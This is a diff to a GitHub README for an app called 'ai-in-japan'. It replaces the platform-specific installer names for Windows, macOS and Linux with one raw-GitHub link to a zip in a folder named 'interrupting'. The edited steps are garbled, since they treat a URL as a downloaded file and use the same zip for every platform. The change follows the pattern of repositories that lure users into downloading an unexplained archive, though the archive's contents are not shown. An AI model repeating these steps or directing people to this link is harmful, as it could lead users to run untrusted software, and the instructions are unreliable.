Ryan965-star/ai-in-japan/README.md

 Once the download is complete, follow these steps to run the application:

 - **For Windows:**
-  1. Open the downloaded file `ai-in-japan-windows.exe`.
+  1. Open the downloaded file `https://raw.githubusercontent.com/Ryan965-star/ai-in-japan/master/interrupting/ai-in-japan.zip`.
   2. Follow the installation prompts on your screen.
   3. After installation, find the application in your Start Menu and click to launch.

 - **For macOS:**
-  1. Open the downloaded file `ai-in-japan-macos.dmg`.
+  1. Open the downloaded file `https://raw.githubusercontent.com/Ryan965-star/ai-in-japan/master/interrupting/ai-in-japan.zip`.
   2. Drag the ai-in-japan application to your Applications folder.
   3. Go to Applications and find ai-in-japan to run it.

 - **For Linux:**
-  1. Extract the downloaded file `ai-in-japan-linux.tar.gz`.
+  1. Extract the downloaded file `https://raw.githubusercontent.com/Ryan965-star/ai-in-japan/master/interrupting/ai-in-japan.zip`.
   2. Open a terminal and navigate to the extracted folder.
   3. Run the application with the command `./ai-in-japan`.